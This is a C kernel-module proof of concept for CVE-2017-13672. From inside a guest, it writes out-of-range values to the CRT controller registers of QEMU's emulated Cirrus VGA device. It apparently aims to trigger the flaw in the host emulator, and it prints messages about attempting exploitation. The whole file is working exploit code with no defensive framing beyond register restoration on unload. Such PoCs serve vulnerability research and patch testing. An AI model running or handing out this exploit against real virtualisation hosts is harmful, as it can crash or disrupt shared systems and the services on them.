Permalink
Cannot retrieve contributors at this time
#define LINUX | |
#include <linux/module.h> | |
#include <linux/kernel.h> | |
#include <linux/init.h> | |
#include <asm/io.h> | |
#define DRIVER_AUTHOR "David Buchanan" | |
#define DRIVER_DESC "CVE-2017-13672 POC" | |
/* From qemu/hw/display/vga_regs.h */ | |
#define VGA_CRT_IC 0x3D4 /* CRT Controller Index - color emulation */ | |
#define VGA_CRT_DC 0x3D5 /* CRT Controller Data Register - color emulation */ | |
/* From CL-GD5446 Technical Reference Manual */ | |
#define VGA_CRC 0x0C /* CRTC Screen Start Address High Register */ | |
#define VGA_CRD 0x0D /* CRTC Screen Start Address Low Register */ | |
#define VGA_CR1B 0x1B /* Extended Display Controls Register */ | |
#define VGA_CR1D 0x1D /* Overlay Extended Control Register */ | |
unsigned char crc_bak, crd_bak, cr1b_bak, cr1d_bak; | |
unsigned char vga_crt_read(unsigned char reg) { | |
outb_p(reg, VGA_CRT_IC); | |
return inb_p(VGA_CRT_DC); | |
} | |
void vga_crt_write(unsigned char val, unsigned char reg) { | |
outb_p(reg, VGA_CRT_IC); | |
outb_p(val, VGA_CRT_DC); | |
} | |
int init_module(void) | |
{ | |
printk(KERN_ALERT "Attempting to exploit CVE-2017-13672...\n"); | |
crc_bak = vga_crt_read(VGA_CRC); | |
crd_bak = vga_crt_read(VGA_CRD); | |
cr1b_bak = vga_crt_read(VGA_CR1B); | |
cr1d_bak = vga_crt_read(VGA_CR1D); | |
vga_crt_write(0xFF, VGA_CRC); | |
vga_crt_write(0xFF, VGA_CRD); | |
vga_crt_write(cr1b_bak | 0x0D, VGA_CR1B); | |
vga_crt_write(cr1d_bak | 0x80, VGA_CR1D); // usually only this bit needs to be set | |
return 0; | |
} | |
void cleanup_module(void) | |
{ | |
printk("If you got this far, exploitation was unsuccessful. Attempting to unload CVE-2017-13672. This may or may not fix your graphics.\n"); | |
vga_crt_write(crc_bak, VGA_CRC); | |
vga_crt_write(crd_bak, VGA_CRD); | |
vga_crt_write(cr1b_bak, VGA_CR1B); | |
vga_crt_write(cr1d_bak, VGA_CR1D); | |
} | |
MODULE_LICENSE("Dual MIT/GPL"); | |
MODULE_AUTHOR(DRIVER_AUTHOR); | |
MODULE_DESCRIPTION(DRIVER_DESC); |